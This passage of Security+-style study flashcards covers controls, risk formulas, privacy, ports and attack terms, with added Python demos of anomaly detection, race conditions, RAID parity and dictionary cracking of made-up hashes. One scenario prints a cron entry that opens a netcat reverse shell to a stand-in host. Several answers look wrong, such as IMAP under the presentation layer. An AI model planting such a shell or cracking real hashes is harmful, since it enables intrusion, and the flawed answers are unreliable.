no control available to directly address the threat. Fire suppression systems do
not prevent fire damage, but if properly employed, they can mitigate or limit the
level of damage from fire.

What is physical control?


Physical controls prevent specific human interaction with a system and are
primarily designed to prevent accidental operation of something. Physical
controls act before an event, preventing it from actually occurring.

What are the different control categories and types?

Categories are managerial, operational, and technical.

Types are preventative, detective, corrective, deterrent, compensating, and
physical.

Which type of security control is used after the event, in an effort to minimize
the extent of damage?
Corrective
The use of a penetration test to determine
vulnerabilities is an example of what category
of control?
Managerial

The use of combination locks as a security control procedure to limit physical
security risk is an example of what category of control?
Operational

What is SSAE SOC 2 report and types?


SSAE SOC 2 reports focus on internal controls related to compliance or
operations.

A SOC Type I report evaluates whether proper controls are in place at a specific
point in time.
A SOC Type II report is done over a period of time to verify operational efficiency
and effectiveness of the controls.

What is EA?
The Enterprise Architecture (EA) is a broad framework describing all aspects

What is CCM?
Cloud Controls Matrix (CCM) is a list of security controls for the cloud, mapped to
leading standards, best practices, and regulations.

What is CIS?
Organizations often refer to Center for Internet Security (CIS) benchmarks to
develop secure configuration postures.
What is the DoD DISA STIGs program?
Comprehensive, prescriptive configuration guides for all major operating systems
are available here.

Which ISO standard covers risk management activities?
31000

Where would one look for consensus-developed, secure configuration guidelines
for hardening a wide range of technical items?
CIS

What is AUP?
Acceptable use policy (AUP) outlines what the organization considers to be the
appropriate use of its resources, such as computer systems, e-mail, Internet, and
networks. Organizations should be concerned about any personal use of
organizational assets that does not benefit the company.

Acceptable use policy outlines what is considered acceptable behavior for a
computer system’s users. This policy often goes hand-in-hand with an
organization’s Internet usage policy.

What is separation of duties?


No single individual has the ability to conduct transactions alone.

Spreads responsibilities out over an organization so no single individual becomes
the indispensable individual with all of the “keys to the kingdom” or unique
knowledge about how to make everything work.
What is the principle of least privilege?
The principle of least privilege states that users should only have a level of
access permissions required to perform their job.

What is NDA?
Nondisclosure agreements are legally binding documents. Signed NDAs are often
required by employers during the onboarding process to ensure employees are
aware of privacy and confidentiality concerning company data.

What does an onboarding policy include?


An onboarding policy should include provisions for the handling of data, the
disposal of data, acceptable use, and any sanctions that may occur as a result of
misuse.

What is gamification?
Gamification is the use of games to facilitate user training.

What is role-based training?


While all employees may need general security awareness training, they also
need specific role-based awareness training in areas where they have individual
responsibilities.

What is MOU?
A memorandum of understanding (MOU) and memorandum of agreement (MOA)
are legal documents used to describe a bilateral agreement between parties to
some common pursuit or goal.

They generally lack the binding powers of a contract.

What is MSA?
Measurement systems analysis (MSA) is a field of study that examines
measurement systems for accuracy and precision. Before an enterprise relies on
measurement systems, it is important to understand whether the chosen
measurement system is acceptable for its intended use, to understand the
different sources of variation present in it and to identify and understand sources
of bias, errors, and factors associated with repeatability and reproducibility.

What is BPA?
A business partnership agreement (BPA) is a legal agreement between partners
that establishes the terms, conditions, and expectations of the relationship
between the partners.

These details can cover a wide range of issues, including typical items such as
the sharing of profits and losses, the responsibilities of each partner, the addition
or removal of partners, and any other issues

Difference between End of Life (EOL) and End of Service Life (EOSL)?
End of service life (EOSL) or end of support is when the manufacturer quits
selling an item. In most cases, the manufacturer no longer provides maintenance
services or updates.

What is data governance?


Data governance is the process of managing the availability, usability, integrity,
and security of the data in enterprise systems. This must be done by policy, as it
involves a large number of data owners and users.

Difference between change management and change control?
Change management is about the process of applying change. Change control is
about the details of the change itself.
What is asset management?
Asset management is the policies and processes used to manage the elements
of the system, including hardware, software, and the data that is contained
within them.

What is legacy systems threat?


Legacy systems are older, pre-existing systems. The true issue behind what makes
a system a legacy system is the concept of technical debt. Technical debt is the
cost incurred over time as a result of not maintaining a system completely.

What is multiparty risk?


When financing for a project comes from another firm and subcontractors are
involved, other parties’ determinations of acceptable risk levels become an issue
very quickly.

What are the six different types of risk?


External, internal, legacy systems, multiparty, IP theft, and software compliance/
licensing.

What is risk management?


Decision-making process
Risk management strategies include elements of threat assessment, risk
assessment, and security implementation concepts, all positioned within the
concept of business management.

What are four things you can do to respond to risk?
accept it
transfer it
avoid it
mitigate it
What is acceptance when it comes to risk?
For example, a manager may choose to allow a programmer to make
“emergency” changes to a production system (in violation of good separation of
duties) because the system cannot go down during a given period of time.

What is avoidance when it comes to risk?


Not deploying a module that increases risk is one manner of risk avoidance.

What is transference when it comes to risk?


Transference of risk is when the risk in a situation is covered by another entity

Cloud computing, contracts and legal agreements will denote which parties are
assuming which risks.

What is mitigation when it comes to risk?


Risk can also be mitigated through the application of controls that reduce the
impact of an attack. Controls can alert operators so that the level of exposure is
reduced through process intervention.

What is risk register?


A risk register is a list of the risks associated with a system.

What is risk matrix/heat map?


A risk matrix or heat map is used to visually display the results of a qualitative
risk analysis

Use the numbers 1 to 5 for each of the axes, and this yields risk values from 1 to
25.
What is Risk Control Assessment?
A risk control assessment is a tool used by the Financial Industry Regulatory
Authority (FINRA) to assess a series of risks associated with their member
institutions

What is Risk Control Self-Assessment?


Risk control self-assessment is a technique that employs management and staff
of all levels to identify and evaluate risks and associated controls

What is control risk?


Control risk is when the risk specifically affects the financial reporting.

What is Sarbanes-Oxley Act of 2002?


protects investors from corporate fraud and bad financial reporting

Difference between quantitative and qualitative risk?
Quantitative means you can actually count something, whereas qualitative is
more subjective, with values such as high, medium, and low.

What can the impact be when a threat exploits a vulnerability?
Loss of life
Company-owned property damage
Safety - injury
Finance
Reputation
What is asset value? (AV)
The asset value (AV) is the amount of money it would take to replace an asset.

What is SLE?
Single-Loss Expectancy (SLE)
SLE = asset value (AV) × exposure factor (EF)

For example, to calculate the exposure factor, assume the asset value of a small
office building and its contents is $2 million. Also assume that this building
houses the call center for a business, and the complete loss of the center would
take away about half of the capability of the company.

$2 million × 0.5 = $1 million

What is ALE?
Annualized loss expectancy (ALE) is calculated by multiplying the SLE by the
likelihood or number of times the event is expected to occur in a year, which is
called the annualized rate of occurrence (ARO):

ALE = SLE × ARO

What is ARO?
The annualized rate of occurrence (ARO) is a representation of the frequency of
the event, measured in a standard year. If the event is expected to occur once in
20 years, then the ARO is 1/20.

The ALE determines a threshold for evaluating the cost/benefit ratio of a given
countermeasure. Therefore, a countermeasure to protect this business
adequately should cost no more than the calculated ALE

What is RTO?
The term recovery time objective (RTO) is used to describe the target time that is
set for the resumption of operations after an incident.
A shorter RTO results in higher costs because it requires greater coordination and
resources.

What is RPO?
Recovery point objective (RPO) is the time period representing the maximum
period of acceptable data loss.

RPO defines the frequency of backup operations necessary to prevent
unacceptable levels of data loss.

Difference between RTO and RPO?


The RTO serves the purpose of defining the requirements for business continuity,
while the RPO deals with backup frequency.

What is MTTR and how to calculate?


Mean time to repair (MTTR) is a common measure of how long it takes to repair a
given failure.

MTTR = (total downtime) / (number of breakdowns)

What is availability and how do you calculate it?
Availability is a measure of the amount of time a system performs its intended
function.

Availability = MTBF / (MTBF + MTTR)


MTBF = Mean Time Between Failures

Assuming a system has an MTBF of 6 months and the repair takes 30 minutes,
the availability would be the following:

Availability = 6 months / (6 months + 30 minutes) = 99.9884%


What is MTBF?
Mean time between failures is a common measure of reliability of a system and
is an expression of the average time between system failures.

The time between failures is measured from the time a system returns to service
until the next failure. The MTBF is an arithmetic mean of a set of system failures:

MTBF = ∑ (start of downtime – start of uptime) / number of failures

Name often used to describe the process of addressing the questions associated
with sources of risk, their impacts, and the steps taken to mitigate them in the
enterprise?
Business impact analysis

What is private data?


The term private data is usually associated with personal data belonging to a
person and less often with corporate entities. (Passwords)

What is confidential data?


Data is labeled confidential if its disclosure to an unauthorized party would
potentially cause serious harm to the organization.

What is considered critical data?


Data is labeled critical if its disclosure to an unauthorized party would potentially
cause extreme harm to the organization.

Common examples of critical data include trade secrets, proprietary software
code, and new product designs, as the release of these could result in significant
loss to the firm.
What is proprietary data?
Proprietary data is data that is restricted to a company because of potential
competitive use.

What is PII?
Personally identifiable information

PII refers to information that can be used to distinguish or trace an individual’s
identity, either alone or when combined with other personal or identifying
information that is linked or linkable to a specific individual.

What is PHI?
Protected health information

PHI is any information that is created or received by a health care provider,
health plan, public health authority, employer, life insurer, school or university,
or health care clearinghouse and relates to the past, present, or future physical
or mental health or condition of an individual; the provision of health care to an
individual; or the past, present, or future payment for the provision of health
care to an individual.

What is anonymization when it comes to data?


Data anonymization is the process of protecting private or sensitive information
by removing identifiers that connect the stored data to an individual.

Separating the PII elements such as names, Social Security numbers, and
addresses from the remaining data through a data anonymization process
retains the usefulness of the data but keeps the connection to the source
anonymous.

What is pseudo-anonymization when it comes to data?
Replaces private identifiers with fake identifiers or pseudonyms (for example,
replacing the value of the name identifier “Mark Sands” with “John Doe”).
Pseudonymization preserves statistical accuracy and data integrity, allowing the
modified data to be used for training, development, testing, and analytics while
protecting data privacy.

What is data controller responsible for?


What data is collected
Where and how it is used
With whom and how data is shared
How long the data is kept and how it is disposed at the end of life

What is data processor responsible for?


Developing and implementing IT processes and systems that manage personal
data
Implementing security measures that would safeguard personal data
Using tools and strategies to properly handle personal data

Who is data privacy officer?


The data privacy officer (DPO) is the C-level executive who is responsible for
establishing and enforcing data privacy policy and addressing legal and
compliance issues.

What is privacy impact assessment?


Structured approach to determining the gap between desired privacy
performance and actual privacy performance

Organizations that collect, use, store, or process personal information are
required to conduct a privacy impact assessment.

Difference between privacy policy and privacy notice?
Privacy policy is internally focused, telling employees what they may do with
personal information, whereas a privacy notice is externally facing, telling
customers, regulators, and other stakeholders what the organization does with
personal information.

What is privacy?
One’s ability to control information about oneself

Who is responsible for determining what data is needed by the enterprise?
Data owner

What is the term for notifying customers of your privacy policy and its effect on
their information?
Privacy notice

What protocols are used in application layer?


HTTP(s), SNMP, SMTP, FTP(s), Telnet, SSH, DNS

What protocols are used in presentation layer?


SSL, TLS, IMAP, SSH

What protocols are used in session layer?


NetBIOS, RTP, PPTP

What is presentation layer responsible for?


Data compression, character set translation, and encryption are found in this
layer.
What is session layer responsible for?
The primary responsibility of the session layer is the managing of communication
sessions between machines. The management functions include initiating,
maintaining, and terminating sessions.

What port is used by FTP?


20 for data, 21 for control

What port is used by SSH?


22

What port is used by Telnet?


23

What port is used by SMTP?


25

What port is used by HTTP?


80

What port is used by HTTPS?


443

What port is used by POP3?


110
What port is used by NetBIOS?
137, 138, 139

What port is used by IMAP?


143

What port is used by SNMP?


161

What port is used by encrypted SMTP?


465

What port is used by LDAPS?


636

What port is used by FTPS?


990

What port is used by Secure IMAP?


993

What port is used by Secure POP3?


995
What port is used by RDP?
Remote desktop protocol 3389

What is a swapfile?
A swapfile is a location on a hard disk drive used as the virtual memory
extension of a computer's RAM.

Where to find evidence of SQL injection attacks against an Apache web server on
a Debian server?
access.log

The company that Gary works for has identified the need to run separate systems
for credit card processing and general office use. Unfortunately, the organization
does not have space or funds to put secondary systems in place and so instead
opts to use dedicated credit card processing devices. What type of control is
this?
The control that Gary has implemented is specifically designed to compensate
for a control that is too expensive to implement. This is an example of a
compensating control. A preventive control attempts to stop a risk from
happening, a managerial control is often a process or a policy, and a deterrent
control discourages risk actors from taking action.

Which factor is the best indicator of an encryption key’s strength once you know
the encryption algorithm in use?
The key length
What are 3 components of CI/CD environment?
Visibility
Feedback
Continuous deployment

Tom has been asked to implement a solution that will help his organization apply
least privilege principles to local administrative accounts as well as to Windows
domain accounts. What type of solution should he look for?
Privileged access management, or PAM, focuses on the enhanced capabilities
that accounts like administrator and power user accounts have. A PAM tool will
help Tom to manage and maintain those accounts and their rights. None of the
other answers are correct. A discretionary access control (DAC) system is used to
allow users to delegate rights to resources they control or own. SSO is single
sign-on, and Challenge Handshake Authentication Protocol (CHAP) is an
authentication protocol.

Tom logs into his Google account to access services on a photo-editing site. What
role is Google playing in this scenario?
IdP - identity provider.

What is VIP?
Virtual IP

What command can add text to the end of a file? netcat, head, tail, cat?
cat
What is the difference between MAC and DAC?
Mandatory access control (MAC) is a type of access control that enforces
authorization rules by the operating system. Users cannot override
authentication or access control policies. Discretionary access control (DAC) does
not have centralized control of authorization, and users can override
authentication and access control policies.

Mikayla believes that the system she is reviewing may have fallen victim to a DLL
injection attack. What type of malware is she most likely to find?
Memory resident malware

Henry wants to conduct a risk assessment for his organization and needs to
calculate the exposure factor (EF) for a system. What type of assessment should
he conduct?
quantitative

What is CASB?
Cloud access security broker

What would prevent a user from installing a program on a company-owned mobile
device?
Allow list

How is MTBF calculated?


Mean time between failures (MTBF) is calculated by dividing the number of
operational hours (its uptime) by the number of failures during that time period.
What is default port for LDAP?
389

Which of the following is not a type of log that will be captured using journald,
and thus made available via journalctl?
Web server messages continue to be logged to a specific web server log file,
whereas journald captures messages produced by initrd, the kernel, and system
services as well as other components of a Linux system.

What is the downside of voice recognition systems?
The systems require training.

Derek wants to access a filesystem on a machine that has experienced an operating system failure that prevents it from booting. What nonpersistent option will allow him to boot the system without the operating system working?
Live boot media is designed to allow an operating system to be started without having a copy on the system's disk drive. Live boot tools are nonpersistent and are often used for forensic recovery, system repair, and remediation, and to safely run a system that can then be purged by simply shutting it down. Reverting to a known good state or a last-known good checkpoint works with the existing OS, and a reinstallation will not meet the conditions expressed in the scenario.

What is pivoting?
Pivoting is using a system the attacker has already compromised as a foothold to reach and attack other systems on networks that could not be accessed directly (for example, an internal-only network segment), then repeating the process from each newly compromised host.
How does a hypervisor enable multiple guest
operating systems to run concurrently on a
host computer?
By abstracting the hardware from the guest operating system

When a program is installed and needs permissions, what is this called?
Provisioning

When you're designing and tweaking biometric systems, the point where both the accept and reject error rates are equal is known as which of the following?
The crossover error rate

Which backup strategy includes only the files and software that have changed since the last full backup?
Differential backup

Alarms are effective only if?
They are tuned to provide accurate and useful alerts.

What is confidentiality?
Information has not been disclosed to unauthorized people

What is integrity?
Information has not been modified or altered without proper
authorization
What are examples of physical controls?
Alarm systems, locks, surveillance cameras, identification cards, and security guards

What are examples of technical controls?
Smart cards, encryption, access control lists (ACLs), intrusion detection systems, and network authentication

Difference between polymorphic and metamorphic virus?
Polymorphic
• Advanced version of an encrypted virus that changes itself every time it is executed by altering the decryption module to avoid detection

Metamorphic
• Virus that is able to rewrite itself entirely before it attempts to infect a file (advanced version of a polymorphic virus)

What is often used by rootkits?
DLL injection is commonly used by rootkits to maintain their persistent control.

What can be used by an attacker to maintain persistent access?
RAT - Remote Access Trojan

What is a dropper?
Malware designed to install or run other types of malware embedded in a payload on an infected host

What is a downloader?
A piece of code that connects to the Internet to retrieve additional tools after the initial infection by a dropper

What is living off the land?
Exploit techniques that use standard system tools and packages (for example PowerShell, WMI, certutil, or cron) to perform intrusions.
Detection of an adversary is more difficult when they are executing malicious code within standard tools and processes.

What is anomaly-based detection?
Analyzes the current traffic against an established baseline and triggers an alert if it falls outside the statistical average

Types of alerts (true/false, positive/negative)
§ True positive
• Malicious activity is identified as an attack
§ False positive
• Legitimate activity is identified as an attack
§ True negative
• Legitimate activity is identified as legitimate traffic
§ False negative
• Malicious activity is identified as legitimate traffic
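The two cards above fit together: a baseline detector produces alerts, and each alert (or non-alert) lands in one of the four cells. The following Python is an added example, not part of the original notes. It builds a mean-plus-k-standard-deviations baseline from a constructed training window of requests per minute, flags observations outside it, and scores the result against constructed ground truth. The traffic values and the "malicious" labels are made up for illustration; the threshold multiplier k is the tuning knob the alarm card refers to.

```python
"""Baseline-and-threshold anomaly detection with TP/FP/TN/FN scoring (added example)."""
from statistics import mean, pstdev

# Constructed training window: requests per minute during a known-normal period.
BASELINE = [100, 104, 98, 101, 97, 103, 99, 102, 100, 96]

# Constructed observation window: (requests_per_minute, is_actually_malicious).
OBSERVED = [
    (101, False),
    (99, False),
    (180, True),    # flood: clearly outside the baseline
    (106, False),   # mild legitimate spike
    (112, False),   # larger legitimate spike (marketing campaign, say)
    (103, True),    # low-and-slow attack hiding inside normal volume
]


def build_baseline(samples, k=3.0):
    """Return the (low, high) band of normal: mean +/- k standard deviations."""
    mu = mean(samples)
    sigma = pstdev(samples)
    return mu - k * sigma, mu + k * sigma


def is_anomalous(value, bounds):
    low, high = bounds
    return value < low or value > high


def classify(observed, bounds):
    """Score each observation as TP/FP/TN/FN given the detector's decision and the truth."""
    counts = {"TP": 0, "FP": 0, "TN": 0, "FN": 0}
    for value, malicious in observed:
        alert = is_anomalous(value, bounds)
        if alert and malicious:
            counts["TP"] += 1
        elif alert and not malicious:
            counts["FP"] += 1
        elif not alert and not malicious:
            counts["TN"] += 1
        else:
            counts["FN"] += 1
    return counts


if __name__ == "__main__":
    for k in (3.0, 2.0):
        print(f"k={k}:", classify(OBSERVED, build_baseline(BASELINE, k)))
```

Tightening k from 3 to 2 turns the 106-request minute into a second false positive while the low-and-slow attacker at 103 stays a false negative either way: purely statistical thresholds catch volume, not intent, which is why such alerts need tuning and corroborating signals.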

What is HIDS and what is it used for?
Host-based IDS
HIDS logs are used to recreate the events after an attack has occurred
What are the most commonly used encryption
softwares for hard drives?
FileVault
BitLocker

What is TPM?
Trusted Platform Module (TPM)
Chip residing on the motherboard that securely stores cryptographic keys (for example, the key protecting a BitLocker volume)
If your motherboard doesn't have a TPM, the key can instead be stored on an external USB drive that must be present at boot

What is HSM?
Hardware Security Module (HSM)
Physical devices that act as a secure cryptoprocessor during the encryption
process

What is UEBA?
User and Entity Behavior Analytics (UEBA)
§ A system that can provide automated identification of suspicious activity by user accounts and computer hosts
§ UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning

Hardening mobile devices steps
1. Update your device to the latest version of the software
2. Install antivirus
3. Train users on proper security and use of the device
4. Only install apps from the official mobile stores
5. Do not root or jailbreak your devices
6. Only use v2 SIM cards with your devices
7. Turn off all unnecessary features
8. Turn on encryption for voice and data
9. Use strong passwords or biometrics
10. Don't allow BYOD
Ensure your organization has a good security policy for mobile devices

What is an application whitelist (allow list)?
Only applications that are on the list are allowed to be run by the operating system, while all other applications are blocked

What is an application blacklist (block list)?
Any application placed on the list will be prevented from running, while all others will be permitted to run

Which filesystem is commonly used on Linux?
ext4 (a filesystem type, not a file extension)

What is due diligence?
A legal principle identifying that a subject has used best practice or reasonable care when setting up, configuring, and maintaining a system

What is RoT?
Hardware Root of Trust (RoT)
o A cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics
o A hardware root of trust is used to measure the boot components and OS files and verify their signatures; the measurements are then signed to produce a report that a remote party can check (attestation)
What is atomic execution?
Certain operations that should only be performed once or not at all, such as
initializing a memory location

What set of algorithms is designed for low-power devices such as the Internet of Things and embedded systems?
Lightweight cryptography

What is the most secure means of establishing connectivity to a Wi-Fi access point?
SAE (Simultaneous Authentication of Equals), the WPA3 handshake that replaces WPA2's pre-shared key exchange

Three modes that are supported by Bluetooth 4.0
Classic, High Speed, and Low Energy.

What is UEM?
Unified endpoint management (UEM) solutions can address a wider range of devices than mobile device management (MDM) alone

What is IdP?
Identity provider

Difference between data anonymization and pseudonymization?
Data anonymization protects sensitive data by removing the identifiers that connect the stored data to the individual.
Pseudonymization preserves statistical accuracy and data integrity by replacing identifiers with stand-in values, for example replacing the name "Mark Sands" with "John Doe"; the original can still be recovered if the mapping is available.

What is IPFIX used for?
Capturing which machines are in communication with each other (flow records)

Which type of evidence is also known as associative or physical evidence and includes tangible objects that prove or disprove a fact?
Real evidence

John has discovered that an attacker is trying to get network passwords by using software that attempts a number of passwords from a list of common passwords. What type of attack is this?
Dictionary attacks use a list of words that are believed to be likely passwords. A rainbow table is a precomputed table of hashes. Brute force tries every possible combination. If an attacker has the original plaintext and ciphertext for a message, they can determine the key through brute-force attempts against the key space. Session hijacking is when the attacker takes over an authenticated session.

Valerie is responsible for security testing applications in her company. She has discovered that a web application, under certain conditions, can generate a memory leak. What type of attack would this leave the application vulnerable to?
A denial-of-service (DoS) attack may target a memory leak. If an attacker can induce the web application to generate the memory leak, then eventually the web application will consume all memory on the web server and the web server will crash. Backdoors are not caused by memory leaks. SQL injection places malformed SQL into input fields. A buffer overflow attempts to put more data in a variable than it can hold.

What two files are commonly attacked using offline brute-force attacks?
The Windows Security Account Manager (SAM) file and the /etc/shadow file on Linux systems both contain password hashes and are popular targets for offline brute-force attacks.
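To make the difference between the dictionary attack card above and the offline brute-force card concrete, here is an added Python example (not from the original notes). It runs an offline dictionary attack against constructed shadow-style records and an exhaustive brute force over a tiny keyspace. Everything is made up: the usernames, salts, passwords, and wordlist are constructed, and a single salted SHA-256 stands in for the slow crypt(3) formats ($6$ SHA-512-crypt, $y$ yescrypt) that real /etc/shadow entries use, so the example needs no third-party library.

```python
"""Offline dictionary attack vs. exhaustive brute force on salted hashes (added example)."""
import hashlib
import itertools
import string


def hash_password(password: str, salt: str) -> str:
    # Single SHA-256 of salt||password. Real systems use many-round KDFs; this is for illustration only.
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed "shadow" records: user -> (salt, hash). Nothing here is real.
RECORDS = {
    "alice": ("s4lt1", hash_password("Summer2023!", "s4lt1")),
    "bob": ("s4lt2", hash_password("letmein", "s4lt2")),
    "carol": ("s4lt3", hash_password("x9#Qv!2pLm", "s4lt3")),  # random-looking, not in any list
}

# Constructed wordlist of "common" passwords.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2023", "Summer2023!"]


def dictionary_attack(records, wordlist):
    """Hash each candidate with each user's salt; return {user: recovered_password}."""
    cracked = {}
    for user, (salt, digest) in records.items():
        for word in wordlist:
            if hash_password(word, salt) == digest:
                cracked[user] = word
                break
    return cracked


def brute_force(salt, digest, alphabet=string.ascii_lowercase, max_len=4):
    """Try every string over `alphabet` up to max_len. Feasible only for tiny keyspaces."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if hash_password(candidate, salt) == digest:
                return candidate
    return None


def keyspace_size(alphabet_size, length):
    """Number of candidates a full brute force of exactly `length` symbols must hash."""
    return alphabet_size ** length


if __name__ == "__main__":
    print("dictionary:", dictionary_attack(RECORDS, WORDLIST))
    salt, digest = RECORDS["carol"]
    print("brute force (lowercase, <=3 chars):", brute_force(salt, digest, max_len=3))
    print("95-printable, 10 chars keyspace:", keyspace_size(95, 10))
```

The salt defeats rainbow tables (each user's hash must be attacked separately) but does nothing against a dictionary attack on a weak password; only a strong password or a slow hash raises the attacker's cost.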

A penetration tester calls a staff member for her target organization and introduces herself as a member of the IT support team. She asks if the staff member has encountered a problem with their system, then proceeds to ask for details about the individual, claiming she needs to verify that she is talking to the right person. What type of social engineering attack is this?
Pretexting is a type of social engineering that involves using a false motive and lying to obtain information. Here, the penetration tester has lied about their role and why they are calling (impersonation), and then built some trust with the user before asking for personal information. A watering hole attack leverages a website that the targeted users all use and places malware on it to achieve the attacker's purpose. Prepending is described by CompTIA as "adding an expression or a phrase," and shoulder surfing involves looking over an individual's shoulder or otherwise observing them entering sensitive information like passwords.

Why is SSL stripping a particular danger with open Wi-Fi networks?
Open hotspots do not assert their identity in a secure way.

Since open Wi-Fi hotspots do not have a way to prove they are legitimate, they can be easily spoofed. Attackers can stand up a fake version of the hotspot and then conduct an SSL stripping attack by inserting themselves into sessions that victims attempt to open to secure servers.

Mary has discovered that a web application
used by her company does not always handle
multithreading properly, particularly when
multiple threads access the same variable. This
could allow an attacker who discovered this
vulnerability to exploit it and crash the server.
What type of error has Mary discovered?
race condition
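Mary's card describes a check-then-act race on a shared variable. The Python below is an added example (not from the original notes) that forces the bad interleaving deterministically: two threads both check a constructed account balance before either deducts, so both withdrawals succeed and the balance goes negative. The hardened version makes the check and the deduction a single critical section under a lock. The account, the amounts, and the barrier used to force the schedule are all constructed for illustration.

```python
"""Time-of-check/time-of-use race on a shared balance, and the locked fix (added example)."""
import threading


class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def racy_withdraw(acct, amount, barrier):
    """Vulnerable: the check and the deduction are separate steps.

    The barrier is test scaffolding that forces both threads past the check
    before either deducts; in production the same thing happens by chance.
    """
    if acct.balance >= amount:          # time of check
        barrier.wait()                  # other thread also passes the check here
        acct.balance -= amount          # time of use, acting on stale information
        return True
    return False


def safe_withdraw(acct, amount):
    """Hardened: check and deduct atomically under the account's lock."""
    with acct.lock:
        if acct.balance >= amount:
            acct.balance -= amount
            return True
        return False


def run_racy(start=100, amount=60):
    acct = Account(start)
    barrier = threading.Barrier(2, timeout=5)
    threads = [threading.Thread(target=racy_withdraw, args=(acct, amount, barrier)) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.balance                 # two 60s withdrawn from 100 -> -20


def run_safe(start=100, amount=60):
    acct = Account(start)
    results = []
    threads = [threading.Thread(target=lambda: results.append(safe_withdraw(acct, amount))) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.balance, sorted(results)  # exactly one succeeds -> (40, [False, True])


if __name__ == "__main__":
    print("racy balance:", run_racy())
    print("safe balance, results:", run_safe())
```

The same pattern with a file (check permissions, then open) or a counter (read, then write) is what lets an attacker who can control timing double-spend, bypass a limit, or corrupt state until the server falls over.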

Ryan needs to verify that no unnecessary ports and services are available on his systems, but he cannot run a vulnerability scanner. What is his best option?
Configuration reviews, either using an automated tool or manual validation, can be a useful proactive way to ensure that unnecessary ports and services are not accessible. Configuration management tools can also help ensure that expected configurations are in place. Neither passive nor active network packet capture will show services that are not accessed, meaning that open ports could be missed, and log review won't show all open ports either.

Amanda encounters a Bash script that adds the following cron entry (via crontab -e):

0 * * * * nc example.com 8989 -e /bin/bash

This entry starts a reverse shell connecting to example.com on port 8989 at minute 0 of every hour. Note that the -e (execute) option exists only in some netcat variants, such as traditional netcat and Nmap's Ncat; the OpenBSD netcat shipped by many distributions does not support it. If you're not familiar with cron, you should take a moment to read the basics of cron commands and what you can do with them; you can read a man page for cron at manpages.ubuntu.com/manpages/focal/man8/cron.8.html.

What is consensus?
Consensus, sometimes called social proof, is a social engineering principle that
leverages the fact that people are often willing to trust groups of other people.
Acme Company is using smartcards that use
near-field communication (NFC) rather than
needing to be swiped. This is meant to make
physical access to secure areas more secure.
What vulnerability might this also create?
Eavesdropping

Chris wants to detect a potential insider threat using his security information and event management (SIEM) system. What capability best matches his needs?
User behavior analysis is a key capability when attempting to detect potential insider threats. Chris can use his SIEM's behavioral analysis capabilities to detect improper or illicit use of rights and privileges as well as abnormal behavior on the part of his users.

Spyware is an example of what type of malware?
PUP (potentially unwanted program)

Which RAID level uses distributed parity bits?
RAID level 5 is disk striping with distributed parity

What does RAID 1 provide?
Mirroring

What does RAID 3 provide?
Disk striping with dedicated parity

Which level of RAID is a "stripe of mirrors"?
1+0
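The RAID cards above say "parity" without showing what it buys you. The following Python is an added example, not from the original notes: it stripes a constructed byte string across four simulated disks with RAID 5-style rotating XOR parity, destroys one disk, and rebuilds it from the survivors. Disk count, block size, and the data are all constructed; it models the parity arithmetic only, not a real controller's layout or on-disk metadata.

```python
"""RAID 5 striping with rotating XOR parity, single-disk failure and rebuild (added example)."""


def xor_blocks(blocks):
    """XOR any number of equal-length byte blocks together."""
    out = bytearray(blocks[0])
    for blk in blocks[1:]:
        for i, b in enumerate(blk):
            out[i] ^= b
    return bytes(out)


def parity_disk_for(stripe_index, n_disks):
    """Rotate the parity block across disks so no single disk becomes the parity bottleneck."""
    return (n_disks - 1 - stripe_index) % n_disks


def raid5_write(data, n_disks=4, block_size=8):
    """Return a list of n_disks 'disks', each a list of blocks, one per stripe."""
    if n_disks < 3:
        raise ValueError("RAID 5 needs at least three disks")
    per_stripe = (n_disks - 1) * block_size
    padded = data + b"\x00" * (-len(data) % per_stripe)   # zero-pad the final stripe
    disks = [[] for _ in range(n_disks)]
    for s in range(len(padded) // per_stripe):
        chunk = padded[s * per_stripe:(s + 1) * per_stripe]
        data_blocks = [chunk[i * block_size:(i + 1) * block_size] for i in range(n_disks - 1)]
        parity = xor_blocks(data_blocks)
        p = parity_disk_for(s, n_disks)
        remaining = iter(data_blocks)
        for d in range(n_disks):
            disks[d].append(parity if d == p else next(remaining))
    return disks


def raid5_read(disks, length):
    """Reassemble the data blocks in stripe order, skipping parity, and strip padding."""
    n_disks = len(disks)
    out = bytearray()
    for s in range(len(disks[0])):
        p = parity_disk_for(s, n_disks)
        for d in range(n_disks):
            if d != p:
                out += disks[d][s]
    return bytes(out[:length])


def raid5_rebuild(disks, failed):
    """Every block on the failed disk equals the XOR of the other blocks in its stripe."""
    survivors = [d for d in range(len(disks)) if d != failed]
    n_stripes = len(disks[survivors[0]])
    return [xor_blocks([disks[d][s] for d in survivors]) for s in range(n_stripes)]


def fail_and_recover(data, failed, n_disks=4, block_size=8):
    """Write, lose one disk, rebuild it; return (data read back, rebuilt disk identical?)."""
    disks = raid5_write(data, n_disks, block_size)
    original = disks[failed]
    disks[failed] = None                  # simulate the failure
    disks[failed] = raid5_rebuild(disks, failed)
    return raid5_read(disks, len(data)), disks[failed] == original


if __name__ == "__main__":
    sample = b"Stripe-level parity lets one disk die."   # constructed payload
    print(fail_and_recover(sample, failed=2))
```

A single XOR parity block only ever encodes one unknown, which is why a second failure during a rebuild is fatal for RAID 5; RAID 6 adds an independent second parity (Reed-Solomon style) so two unknowns can be solved.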

Elizabeth wants to implement a cloud-based authorization system. Which of the following protocols is she most likely to use for that purpose?
OAuth is a common authorization protocol used for cloud services. It allows users to decide which websites or applications to entrust their information to without requiring them to give those applications the user's password.

Isabella is responsible for database management and security. She is attempting to remove redundancy in the database. What is this process called?
Normalization

What is a disadvantage of tape-based backup?
Tapes take longer to restore from.

What is included in a blockchain's public ledger?
Blockchain public ledgers contain an identity for participants (although the identity may be semi-anonymous), the transaction record, and the balance or other data that the blockchain is used to store.

Different types of fire suppression systems
Inert gas systems - reduce the oxygen in a room to a level that suppresses fire without the toxicity hazard of carbon dioxide
Dry-pipe and pre-action (pre-charge) systems - use water
Carbon dioxide - displaces oxygen and can be harmful to people in the room
What is the most secure physical lock?
Deadbolt

Different types of physical locks
Deadbolt - the most secure
Padlock
Key-in-knob
Combination lock

